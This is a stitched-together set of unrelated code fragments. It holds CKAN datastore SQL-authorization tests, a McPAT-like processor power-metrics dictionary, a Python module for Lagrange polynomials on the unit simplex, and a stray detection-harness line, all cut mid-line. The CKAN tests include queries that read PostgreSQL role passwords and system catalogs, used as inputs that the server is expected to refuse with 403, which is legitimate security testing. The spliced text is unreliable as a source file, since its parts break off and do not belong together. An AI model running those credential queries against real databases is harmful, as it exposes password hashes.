        assert len(result["records"]) == len(self.expected_records)
        for (row_index, row) in enumerate(result["records"]):
            expected_row = self.expected_records[row_index]
            assert set(row.keys()) == set(expected_row.keys())
            for field in row:
                # _full_text ordering is not guaranteed, so check membership
                # of each expected lexeme rather than exact equality.
                if field == "_full_text":
                    for ft_value in expected_row["_full_text"]:
                        assert ft_value in row["_full_text"]
                else:
                    assert row[field] == expected_row[field]
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_self_join(self, app):
        """A self-join on author is allowed and returns the expected pairs."""
        query = """
            select a._id as first, b._id as second
            from "{0}" AS a,
                 "{0}" AS b
            where a.author = b.author
            limit 2
            """.format(
            self.data["resource_id"]
        )
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql",
            json={"sql": query},
            extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        result = res_dict["result"]
        assert result["records"] == self.expected_join_results
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures(
        "clean_datastore", "with_plugins", "with_request_context"
    )
    def test_new_datastore_table_from_private_resource(self, app):
        """SQL search against a private resource is denied to normal users."""
        # make a private CKAN resource
        group = self.dataset.get_groups()[0]
        context = {
            "user": self.sysadmin_user.name,
            "ignore_auth": True,
            "model": model,
        }
        package = p.toolkit.get_action("package_create")(
            context,
            {
                "name": "privatedataset",
                "private": True,
                "owner_org": self.organization["id"],
                "groups": [{"id": group.id}],
            },
        )
        resource = p.toolkit.get_action("resource_create")(
            context,
            {
                "name": "privateresource",
                "url": "https://www.example.com/",
                "package_id": package["id"],
            },
        )
        # NOTE(review): this first auth dict is unused -- call_action below
        # runs server-side; it is immediately shadowed before the request.
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        helpers.call_action(
            "datastore_create", resource_id=resource["id"], force=True
        )
        # new resource should be private
        query = 'SELECT * FROM "{0}"'.format(resource["id"])
        data = {"sql": query}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql",
            json=data,
            extra_environ=auth,
            status=403,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is False
        assert res_dict["error"]["__type"] == "Authorization Error"
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_not_authorized_to_access_system_tables(self, app):
        """Queries touching pg_catalog/system tables are rejected with 403."""
        test_cases = [
            "SELECT * FROM pg_roles",
            "SELECT * FROM pg_catalog.pg_database",
            "SELECT rolpassword FROM pg_roles",
            """SELECT p.rolpassword
               FROM pg_roles p
               JOIN "{0}" r
               ON p.rolpassword = r.author""".format(
                self.data["resource_id"]
            ),
        ]
        for query in test_cases:
            data = {"sql": query.replace("\n", "")}
            res = app.post(
                "/api/action/datastore_search_sql", json=data, status=403,
            )
            res_dict = json.loads(res.data)
            assert res_dict["success"] is False
            assert res_dict["error"]["__type"] == "Authorization Error"
class TestDatastoreSQLFunctional(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures(
"clean_datastore", "with_plugins", "with_request_context"
)
def test_search_sql_enforces_private(self):
user1 = factories.User()
user2 = factories.User()
user3 = factories.User()
ctx1 | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.139608,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.62917,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0329262,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.228551,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.171079,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0902112,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.145507,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0734472,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.309166,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0769468,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.2786,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0323204,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00378386,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0399629,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.027984,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0722833,
'Execution Unit/Register Files/Runtime Dynamic': 0.0317678,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.092424,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.244943,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.2198,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000334333,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000334333,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00029559,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000116827,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000401992,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00136625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00304881,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0269017,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71118,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0735086,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0913703,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.01274,
'Instruction Fetch Unit/Runtime Dynamic': 0.196196,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0544301,
'L2/Runtime Dynamic': 0.0146325,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.30583,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.537663,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0345753,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0345753,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.4691,
'Load Store Unit/Runtime Dynamic': 0.742752,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0852568,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.170514,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0302579,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0310588,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106395,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0120998,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.314482,
'Memory Management Unit/Runtime Dynamic': 0.0431586,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7188,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0850198,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00510475,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0447317,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
| |
r"""Polynomials on the m-dimensional unit simplex with values in :math:`\mathbb{R}^n`, expressed using the
Lagrange basis.
.. math:: l(x) = \sum_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}} a_{\nu} l_{\nu, r}(x),
where :math:`a_{\nu} \in \mathbb{R}^n`.
Basis polynomials in the Lagrange basis are uniquely determined by selecting a sequence of
:math:`\dim \mathcal{P}_r (\Delta_c^m)` unique points (Lagrange points) in the unit simplex and demanding that the
i:th basis function has the value one at the i:th of these points and zero at all the other points.
Here we have used evenly spaced Lagrange points, so that for :math:`\dim \mathcal{P}_r (\Delta_c^m)` we have the
Lagrange points
.. math:: \{ x_{\nu} \}_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}}, x_{\nu} = \frac{\nu}{r}.
The basis polynomials :math:`l_{\nu, r}(x), \nu \in \mathbb{N}_0^m, |\nu| \leq r` are thus uniquely determined by the
conditions
.. math:: l_{\nu, r}(x_{\mu}) = \begin{cases} 1 & \nu = \mu \\ 0 & \text{else} \end{cases}.
The set :math:`\{ l_{\nu, r} \}_{\substack{\nu \in \mathbb{N}_0^m \\ |\nu| \leq r}}` is a basis for the space
of all polynomials of degree less than or equal to r on the unit simplex, :math:`\mathcal{P}_r (\Delta_c^m)`.
"""
import numbers
import numpy as np
import polynomials_on_simplices.algebra.multiindex as multiindex
from polynomials_on_simplices.generic_tools.str_utils import (
convert_float_to_fraction, str_dot_product, str_number, str_number_array)
from polynomials_on_simplices.polynomial.code_generation.generate_lagrange_polynomial_functions_simplex import (
generate_function_specific)
from polynomials_on_simplices.polynomial.polynomials_base import PolynomialBase, get_dimension
from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial
from polynomials_on_simplices.polynomial.polynomials_monomial_basis import zero_polynomial as zero_polynomial_monomial
from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis_cache import (
lagrange_basis_coefficients_cache)
def unique_identifier_lagrange_basis():
    """
    Return the string that uniquely identifies the Lagrange polynomial basis
    on the unit simplex (used to tag polynomials with the basis they are
    expressed in).

    :return: Unique identifier.
    :rtype: str
    """
    return "Lagrange"
def generate_lagrange_point(n, r, nu):
    r"""
    Generate a Lagrange point indexed by a multi-index from the set of evenly spaced Lagrange points on the
    n-dimensional unit simplex (:math:`\Delta_c^n`)
    (Lagrange basis points are constructed so that each basis function has the value 1 at one of the points,
    and 0 at all the other points).

    .. math:: x_{\nu} = \frac{\nu}{r}.

    :param int n: Dimension of the simplex.
    :param int r: Degree of the polynomial.
    :param nu: Multi-index :math:`\nu` indexing the Lagrange point, where :math:`\frac{\nu_i}{r}` gives
        the i:th coordinate of the Lagrange point.
    :return: Point in the n-dimensional unit simplex.
    :rtype: :class:`Numpy array <numpy.ndarray>`

    .. rubric:: Examples

    >>> generate_lagrange_point(1, 2, (1,))
    array([0.5])
    >>> generate_lagrange_point(2, 2, (1, 0))
    array([0.5, 0. ])
    >>> generate_lagrange_point(2, 2, (0, 1))
    array([0. , 0.5])
    """
    # Handle special case: the degree-0 space has a single Lagrange point at
    # the origin (and dividing by r below would be undefined).
    if r == 0:
        return np.zeros(n)
    # Start from zeros rather than np.empty: with np.empty any trailing
    # entries (when len(nu) < n) would be uninitialized garbage.
    point = np.zeros(n)
    for i in range(len(nu)):
        point[i] = nu[i]
    point /= r
    return point
def generate_lagrange_points(n, r):
    r"""
    Generate evenly spaced Lagrange points on the n-dimensional unit simplex (:math:`\Delta_c^n`)
    (Lagrange basis points are constructed so that each basis function has the value 1 at one of the points,
    and 0 at all the other points).

    .. math:: \{ x_{\nu} \}_{\substack{\nu \in \mathbb{N}_0^n \\ |\nu| \leq r}}, x_{\nu} = \frac{\nu}{r}.

    :param int n: Dimension of the simplex.
    :param int r: Degree of the polynomial.
    :return: List of points in the n-dimensional unit simplex.
    :rtype: :class:`Numpy array <numpy.ndarray>`

    .. rubric:: Examples

    >>> generate_lagrange_points(1, 2)
    array([0. , 0.5, 1. ])
    >>> generate_lagrange_points(2, 2)
    array([[0. , 0. ],
           [0.5, 0. ],
           [1. , 0. ],
           [0. , 0.5],
           [0.5, 0.5],
           [0. , 1. ]])
    """
    # One-dimensional points are just an even subdivision of [0, 1].
    if n == 1:
        return np.linspace(0.0, 1.0, r + 1)
    points = np.zeros((get_dimension(r, n), n))
    # Handle special case: degree 0 has a single point at the origin.
    if r == 0:
        return points
    # One point per multi-index, in multi-index iteration order.
    for row, mi in enumerate(multiindex.MultiIndexIterator(n, r)):
        points[row] = generate_lagrange_point(n, r, mi)
    return points
def get_lagrange_basis_fn_coefficients(nu, r):
    r"""
    Get monomial coefficients for a Lagrange basis polynomial in the basis for the space
    :math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).

    :param nu: Multi-index indicating which Lagrange basis polynomial we should get monomial coefficients for.
    :type nu: int or :class:`~polynomials_on_simplices.algebra.multiindex.MultiIndex` or Tuple[int, ...]
    :param int r: Degree of polynomial.
    :return: Array containing the coefficients for the basis polynomial.
    :rtype: :class:`Numpy array <numpy.ndarray>`
    """
    # Dimension of the simplex is implied by the length of the multi-index
    # (a bare int means dimension 1).
    try:
        n = len(nu)
    except TypeError:
        n = 1
    # First look for the coefficients in the cache (no need to generate cached coefficients)
    if 1 <= n <= len(lagrange_basis_coefficients_cache) \
            and 1 <= r <= len(lagrange_basis_coefficients_cache[n - 1]):
        # The cache is keyed by plain tuples; normalize nu accordingly.
        if isinstance(nu, multiindex.MultiIndex):
            key = nu.to_tuple()
        elif isinstance(nu, tuple):
            key = nu
        else:
            key = (nu,)
        return lagrange_basis_coefficients_cache[n - 1][r - 1][key]
    # Coefficients need to be generated
    return generate_lagrange_basis_fn_coefficients(nu, r)
def generate_lagrange_basis_fn_coefficients(nu, r):
    r"""
    Generate monomial coefficients for a Lagrange basis polynomial in the basis for the space
    :math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).

    :param nu: Multi-index indicating which Lagrange basis polynomial we should generate monomial coefficients for.
    :type nu: int or :class:`~polynomials_on_simplices.algebra.multiindex.MultiIndex` or Tuple[int, ...]
    :param int r: Degree of polynomial.
    :return: Array containing the coefficients for the basis polynomial.
    :rtype: :class:`Numpy array <numpy.ndarray>`
    """
    # Infer the simplex dimension from the multi-index (ints mean dim 1).
    try:
        n = len(nu)
    except TypeError:
        n = 1
    # The full coefficient matrix holds one basis polynomial per column;
    # pick out the column corresponding to nu's linear index.
    mi = nu if isinstance(nu, multiindex.MultiIndex) else multiindex.MultiIndex(nu)
    column = multiindex.get_index(mi, r)
    return generate_lagrange_base_coefficients(r, n)[:, column]
def get_lagrange_base_coefficients(r, n):
    r"""
    Get monomial coefficients for all the Lagrange base polynomials for the space :math:`\mathcal{P}_r(\Delta_c^n)`,
    with evenly spaced Lagrange points (see :func:`generate_lagrange_points`).

    :param int r: Degree of the polynomial space.
    :param int n: Dimension of the unit simplex.
    :return: Matrix containing the coefficients for each base polynomial as column vectors.
    :rtype: :class:`Numpy array <numpy.ndarray>`
    """
    # First look for the coefficients in the cache (no need to generate cached coefficients)
    if n in range(1, len(lagrange_basis_coefficients_cache) + 1):
        if r in range(1, len(lagrange_basis_coefficients_cache[n - 1]) + 1):
            # The keys were unused in the original items() loop; dicts preserve
            # insertion order, so stacking values keeps the column order intact.
            return np.array(list(lagrange_basis_coefficients_cache[n - 1][r - 1].values())).T
    # Coefficients need to be generated
    return generate_lagrange_base_coefficients(r, n)
def generate_lagrange_base_coefficients(r, n):
    r"""
    Generate monomial coefficients for all the Lagrange base polynomials
    for the space :math:`\mathcal{P}_r(\Delta_c^n)`, with evenly spaced Lagrange points (see
    :func:`generate_lagrange_points`).

    :param int r: Degree of the polynomial space.
    :param int n: Dimension of the unit simplex.
    :return: Matrix containing the coefficients for each base polynomial as column vectors.
    :rtype: :class:`Numpy array <numpy.ndarray>`
    """
    points = generate_lagrange_points(n, r)
    dim = len(points)
    # Build the generalized Vandermonde matrix: entry (row, col) is the
    # col:th monomial evaluated at the row:th Lagrange point.
    vandermonde = np.empty((dim, dim))
    if n == 1:
        for row in range(dim):
            for col in range(dim):
                vandermonde[row, col] = points[row]**col
    else:
        mis = multiindex.generate_all(n, r)
        for row in range(dim):
            for col in range(dim):
                vandermonde[row, col] = multiindex.power(points[row], mis[col])
    # Solving V @ C = I gives coefficients C such that each basis polynomial
    # is 1 at its own Lagrange point and 0 at all others.
    return np.linalg.solve(vandermonde, np.identity(dim))
class PolynomialLagrange(PolynomialBase):
r"""
Implementation of the abstract polynomial base class for a polynomial on the m-dimensional unit simplex,
expressed in the Lagrange basis.
.. math:: l(x) = \sum_{i = 0}^{\dim(\mathcal{P}_r(\mathbb{R}^m)) - 1} a_{\nu_i} l_{\nu_i, r}(x).
"""
    def __init__(self, coeff, r=None, m=1):
        r"""
        :param coeff: Coefficients for the polynomial in the Lagrange basis for :math:`\mathcal{P}_r (\mathbb{R}^m,
            \mathbb{R}^n). \text{coeff}[i] = a_{\nu_i}`, where :math:`\nu_i` is the i:th multi-index in the sequence
            of all multi-indices of dimension m with norm :math:`\leq r`
            (see :func:`polynomials_on_simplices.algebra.multiindex.generate` function).
            Array of scalars for a scalar valued polynomial (n = 1) and array of n-dimensional vectors for a vector
            valued polynomial (:math:`n \geq 2`).
        :param int r: Degree of the polynomial space. Optional, will be inferred from the number of polynomial
            coefficients if not specified.
        :param int m: Dimension of the domain of the polynomial.
        """
        PolynomialBase.__init__(self, coeff, r, m)
        # Base class may have inferred the degree from the coefficient count.
        r = self.degree()
        # Cache the monomial form of the Lagrange basis per (dimension, degree)
        # pair in a class-level dict shared by all instances.
        if not (m, r) in PolynomialLagrange._basis_polynomials_monomial_form:
            PolynomialLagrange._basis_polynomials_monomial_form[(m, r)] = lagrange_basis_monomial(r, m)
        # Compile function for evaluating the polynomial
        self._eval_code, self._eval_fn_name = generate_function_specific(m, self.r, self.coeff)
        compiled_code = compile(self._eval_code, '<auto generated monomial polynomial function, '
                                + str(self.coeff) + '>', 'exec')
        # NOTE(review): exec-ing into locals() and reading the result back out
        # of the locals() snapshot is a CPython-specific idiom -- the generated
        # function never becomes a true local variable of this frame.
        exec(compiled_code, globals(), locals())
        self._eval_fn = locals()[self._eval_fn_name]
def __repr__(self):
return "polynomials_on_simplices.algebra.polynomial.polynomials_unit_simplex_lagrange_basis.PolynomialLagrange("\
+ str(self.coeff) + ", " + str(self.domain_dimension()) + ", " + str(self.degree()) + ")"
    def basis(self):
        r"""
        Get basis for the space :math:`\mathcal{P}_r (\mathbb{R}^m)` used to express this polynomial.

        Delegates to the module-level identifier so every Lagrange polynomial
        reports the same basis name.

        :return: Unique identifier for the basis used.
        :rtype: str
        """
        return unique_identifier_lagrange_basis()
    def __call__(self, x):
        r"""
        Evaluate the polynomial at a point :math:`x \in \mathbb{R}^m`.

        Delegates to the evaluation function compiled in ``__init__``
        specifically for this polynomial's coefficients, so no per-call basis
        computation is done here.

        :param x: Point where the polynomial should be evaluated.
        :type x: float or length m :class:`Numpy array <numpy.ndarray>`
        :return: Value of the polynomial.
        :rtype: float or length n :class:`Numpy array <numpy.ndarray>`.
        """
        return self._eval_fn(x)
def __mul__(self, other):
"""
Multiplication of this polynomial with another polynomial, a scalar, or a vector (for | |
# torch.cuda.synchronize()
for gx, pred_dets in harn._postout_to_pred_dets(inp_size, labels, batch_dets, _aidbase=dmet._pred_aidbase):
